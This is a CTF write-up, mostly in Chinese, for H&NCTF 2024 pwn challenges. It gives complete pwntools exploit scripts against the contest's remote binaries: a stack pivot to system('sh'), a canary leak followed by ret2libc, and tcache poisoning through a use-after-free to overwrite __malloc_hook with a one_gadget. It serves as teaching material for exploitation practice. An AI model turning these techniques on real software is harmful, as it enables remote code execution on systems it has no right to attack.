
H&NCTF 2024 pwn 部分题解

几十个解的题还是能写出来的,但是几个解和0解的题做不出来,我还是太菜了

close

重定向就可以了

exec 1>&2  # send the shell's stdout to stderr from here on (the writeup says a redirect is all that is needed; presumably stdout is unusable in this challenge)

ez_pwn

考一个栈迁移,第一个printf泄露栈地址,然后利用程序自带的2个leave ret完成栈迁移

from pwn import *
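# 32-bit target: the libc below is the i386 build, every address is 0x0804xxxx and
# the exploit uses u32/p32 throughout, so 'amd64' was inconsistent with the binary.
context.arch = 'i386'
context.log_level = 'debug'
local_file = '../ctf_file/pwn'
# Local copy of the remote libc, used for offsets; the path is host-specific.
libc = ELF("/home/feichai/glibc-all-in-one/libs/2.23-0ubuntu3_i386/libc.so.6", checksec=False)
elf = ELF(local_file)

# Set debug to 1 to run the binary locally instead of connecting to the challenge host
# (same switch the other scripts in this writeup use).
debug = 0
if debug:
    io = process(local_file)
else:
    io = remote('hnctf.imxbt.cn', 46959)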


def lg(s, addr):
    """Log *addr* as ``s-->0x...`` in bold yellow through pwntools' info()."""
    line = f"{s}-->0x{addr:02x}"
    return info(f'\033[1;33m{line}\033[0m')

def dbg():
    """Attach gdb to the live tube with the fixed breakpoints, then wait for a keypress."""
    breakpoints = (0x08048616, 0x08048631, 0x08048666)
    script = "\n" + "".join(f"b *0x{bp:08x}\n" for bp in breakpoints)
    gdb.attach(io, script)
    pause()

def r(a):
    """Receive up to *a* bytes from the tube."""
    return io.recv(a)


def ru(a):
    """Receive through the delimiter *a*."""
    return io.recvuntil(a)


def s(a):
    """Send *a* as-is."""
    return io.send(a)


def sa(a, b):
    """Wait for *a*, then send *b*."""
    return io.sendafter(a, b)


def sl(a):
    """Send *a* followed by a newline."""
    return io.sendline(a)


def sla(a, b):
    """Wait for *a*, then send *b* followed by a newline."""
    return io.sendlineafter(a, b)


# Return target used by the pivoted frame below; presumably the binary's own
# system() call site -- confirm in the disassembly.
system = 0x0804857D
# Entry of the backdoor function; not used by the payload below.
backdoor = 0x08048566

# Name prompt: 0x2c bytes of filler; the 4 bytes echoed right after the filler are
# read back as a stack pointer (the printf leak described in the writeup text).
sa(b'your name?',b'a'*0x2c)
ru(b'a'*0x2c)
stack_addr = u32(r(4))
lg("stack_addr",stack_addr)
# Author's offset from the leaked pointer to where the next input is stored.
input_addr = stack_addr- 0x38
lg("input_addr",input_addr)
# Pivot payload (48 bytes): return target, two copies of input_addr+20 (offset 20
# falls on the start of one "sh\0\0" word, so they point at a "sh" string), the
# string block, and input_addr-4 as the overwritten saved ebp so the binary's own
# leave; ret sequence moves esp into this buffer.
s(p32(system)+p32(input_addr+20)*2+b'sh\x00\x00'*8+p32(input_addr-4))

io.interactive()

idea

输入-1转化为unsigned int变成大数造成栈溢出,fmt泄露canary,然后就是经典的ret2libc了

from pwn import *
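# 32-bit target: the libc below is the i386 build, breakpoints are 0x0804xxxx and
# the exploit uses u32/p32 throughout, so 'amd64' was inconsistent with the binary.
context.arch = 'i386'
context.log_level = 'debug'
local_file = '../ctf_file/idea'
# Local copy of the remote libc, used for symbol offsets; the path is host-specific.
libc = ELF("/home/feichai/ctf_libc/puts_150/libc6-i386_2.23-0ubuntu11.3_amd64.so", checksec=False)
elf = ELF(local_file)

# Set debug to 1 to run the binary locally instead of connecting to the challenge host.
debug = 0
if debug:
    io = process(local_file)
else:
    io = remote('hnctf.imxbt.cn', 48805)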

def lg(s, addr):
    """Log *addr* as ``s-->0x...`` in bold yellow through pwntools' info()."""
    line = f"{s}-->0x{addr:02x}"
    return info(f'\033[1;33m{line}\033[0m')

def dbg():
    """Attach gdb to the live tube with the fixed breakpoints, then wait for a keypress."""
    breakpoints = (0x080486CF, 0x080486E9)
    script = "\n" + "".join(f"b *0x{bp:08X}\n" for bp in breakpoints)
    gdb.attach(io, script)
    pause()

def r(a):
    """Receive up to *a* bytes from the tube."""
    return io.recv(a)


def ru(a):
    """Receive through the delimiter *a*."""
    return io.recvuntil(a)


def s(a):
    """Send *a* as-is."""
    return io.send(a)


def sa(a, b):
    """Wait for *a*, then send *b*."""
    return io.sendafter(a, b)


def sl(a):
    """Send *a* followed by a newline."""
    return io.sendline(a)


def sla(a, b):
    """Wait for *a*, then send *b* followed by a newline."""
    return io.sendlineafter(a, b)

puts_plt = elf.plt.puts
puts_got = elf.got.puts
vuln = elf.sym.vuln
#dbg()
# "-1" is converted to an unsigned length (see the writeup text), so the following
# read is effectively unbounded.
sla(b'me to read?',b'-1')
# Format-string read of the 7th stack argument, which the author found to be the canary.
sla(b'u a gift!',b'%7$p')
ru(b'0x')
#leak_addr = int(r(8),16)
#libc_addr = leak_addr - libc.sym[b'__libc_start_main'] - 247
canary = int(r(8),16)  # 8 hex digits: one 32-bit word
lg('canary',canary)
# Round 1: 0x20 filler, the intact canary, three padding dwords, then
# puts(puts_got) with vuln as puts' return address so a second overflow is possible.
pd = b'a'*0x20+p32(canary)+p32(0)*3+p32(puts_plt)+p32(vuln)+p32(puts_got)
sla(b'bytes of data!\n',pd)

# Read up to and including the 0xf7 byte -- the high byte of a 32-bit libc address --
# and take the last 4 bytes as the leaked puts address.
puts_addr = u32(ru(b'\xf7')[-4:])
lg('puts_addr',puts_addr)
libc_base = puts_addr - libc.sym['puts']
lg('libc_base',libc_base)

# NOTE: bytes key here versus the str key used for 'puts' above; pwntools' symbol
# table appears to accept both, but one style throughout would be clearer.
libc_system = libc_base + libc.symbols[b'system']
bin_sh_addr = libc_base + next(libc.search(b'/bin/sh'))

# Round 2: same length trick, dummy gift, then the same frame layout returning into
# system with a dummy return address and the "/bin/sh" pointer as its argument.
sla(b'me to read?',b'-1')
sla(b'u a gift!',b'aaaa')

pd = b'a'*0x20+p32(canary)+p32(0)*3+p32(libc_system) + p32(0) +p32(bin_sh_addr)
sla(b'bytes of data!\n',pd)

io.interactive()

what

tcache 投毒 + uaf漏洞 + 劫持__malloc_hook,修改__malloc_hook为gadget即可

from pwn import *
context.arch = 'amd64'  # 64-bit target (u64/p64 below, glibc 2.27 x86_64 offsets)
context.log_level = 'debug'
context.terminal = ['gnome-terminal', '-e']
local_file = '../ctf_file/what'
# Local copy of the remote libc, used for symbol offsets; the path is host-specific.
libc = ELF("/home/feichai/ctf_file/libc-2.27.so", checksec=False)
elf = ELF(local_file)

# Flip debug to 1 to run the binary locally instead of connecting to the challenge host.
debug = 0
io = process(local_file) if debug else remote('hnctf.imxbt.cn', 50228)

def lg(s, addr):
    """Log *addr* as ``s-->0x...`` in bold yellow through pwntools' info()."""
    line = f"{s}-->0x{addr:02x}"
    return info(f'\033[1;33m{line}\033[0m')

def dbg():
    """Attach gdb to the live tube with no preset breakpoints, then wait for a keypress."""
    script = "\n"  # the original empty triple-quoted block evaluates to a single newline
    gdb.attach(io, script)
    pause()

def r(a):
    """Receive up to *a* bytes from the tube."""
    return io.recv(a)


def ru(a):
    """Receive through the delimiter *a*."""
    return io.recvuntil(a)


def s(a):
    """Send *a* as-is."""
    return io.send(a)


def sa(a, b):
    """Wait for *a*, then send *b*."""
    return io.sendafter(a, b)


def sl(a):
    """Send *a* followed by a newline."""
    return io.sendline(a)


def sla(a, b):
    """Wait for *a*, then send *b* followed by a newline."""
    return io.sendlineafter(a, b)

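def choice(index):
    """Pick menu entry *index* at the command prompt.

    Sends bytes rather than str so the encoding is explicit and matches the
    other scripts in this writeup, which send bytes everywhere.
    """
    sla(b'Enter your command:', str(index).encode())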

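def add(size):
    """Menu option 1: allocate a chunk of *size* bytes.

    Sends bytes rather than str so the encoding is explicit and matches the
    other scripts in this writeup.
    """
    choice(1)
    sla(b'size:', str(size).encode())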

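def free():
    """Menu option 2: free a chunk.

    The program asks for no index here, so which chunk is released is decided
    by the binary, not the caller.
    """
    choice(2)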

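def show(index):
    """Menu option 3: print the contents of chunk *index*.

    Sends bytes rather than str so the encoding is explicit and matches the
    other scripts in this writeup.
    """
    choice(3)
    sla(b'please enter idx:', str(index).encode())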

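def edit(index, content):
    """Menu option 4: write *content* (bytes) into chunk *index*.

    *content* is sent with sendafter, not sendlineafter, so no newline is appended
    and raw payload bytes reach the program unchanged. The index is sent as bytes
    for consistency with the other scripts in this writeup.
    """
    choice(4)
    sla(b'please enter idx:', str(index).encode())
    sa(b'your content:', content)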

# Heap setup: nine 0x80-byte chunks; on the 2.27 libc above a tcache bin holds seven
# entries, so after seven frees the next one presumably goes to the unsorted bin.
for i in range(9):
    add(0x80)

for i in range(7):
    free()

free() #1
# Reading a freed chunk (the UAF from the writeup text) prints its fd, which for an
# unsorted-bin chunk points into main_arena.
show(1)

ru("Content:")
libc_leak = u64(r(6).ljust(8,b'\x00'))  # 6 significant bytes of a 64-bit pointer
lg('libc_leak',libc_leak)

# Author's offset from the leaked main_arena pointer to the libc base.
libc_base = libc_leak - 0x3ebca0 #0x3ebca0
lg('libc_base',libc_base)

malloc_hook = libc_base + libc.sym["__malloc_hook"]
one_gadget = [0x4f29e,0x4f2a5,0x4f302,0x10a2fc]  # candidate offsets; the last one is used
gadget = libc_base + 0x10a2fc

# Tcache poisoning through the UAF write: point a freed chunk's fd at __malloc_hook,
# take two allocations so the second returns that address, then overwrite the hook.
edit(2,p64(malloc_hook))
add(0x80) #1
add(0x80) #2
edit(2,p64(gadget)*8)
# The next malloc goes through the hook.
add(0x20)
#dbg()

io.interactive()